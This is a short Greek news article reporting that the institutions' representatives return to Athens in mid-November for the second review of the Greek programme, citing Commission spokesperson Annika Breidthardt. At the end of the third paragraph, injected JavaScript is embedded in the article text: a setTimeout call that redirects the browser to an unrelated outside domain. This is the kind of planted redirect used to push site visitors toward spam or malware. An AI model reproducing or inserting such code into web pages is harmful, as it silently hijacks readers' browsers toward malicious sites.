Στα μέσα Νοεμβρίου επιστρέφουν οι εκπρόσωποι των θεσμών

0
6

 

Οι διαπραγματεύσεις για τη δεύτερη αξιολόγηση θα συνεχιστεί στα μέσα Νοεμβρίου οπότε θα επιστρέψουν οι εκπρόσωποι των θεσμών στην Αθήνα σύμφωνα με τις δηλώσεις της Ανίκα Μπράιτχαρτ, εκπροσώπου του Επιτρόπου Οικονομίας, Πιερ Μοσκοβισί.

Η Μπράιτχαρτ ανέφερε ότι, κατά τη διάρκεια της τελευταίας αποστολής των εκπροσώπων των θεσμών στην Αθήνα έγιναν «εποικοδομητικές συζητήσεις» οι οποίες θα συνεχιστούν και τις επόμενες εβδομάδες. Η εκπρόσωπος του Μοσκοβισί πρόσθεσε ότι οι εκπρόσωποι των θεσμών θα επιστρέψουν στην Αθήνα στα μέσα Νοεμβρίου, τονίζοντας ότι «όλες οι πλευρές έχουν δεσμευτεί να ολοκληρώσουν τις διαπραγματεύσεις της δεύτερης αξιολόγησης του ελληνικού προγράμματος, το συντομότερο δυνατό».

Ερωτηθείσα αν υπάρχει προοπτική να ανοίξει η συζήτηση για τη συγκεκριμενοποίηση των μέτρων για το χρέος πριν από το τέλος του χρόνου, όπως είχε αναφέρει ο Επίτροπος, η κυρία Μπράιτχαρτ απάντησε ότι η Επιτροπή εργάζεται βάσει της συμφωνίας του Eurogroup της 24ης Μαΐου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here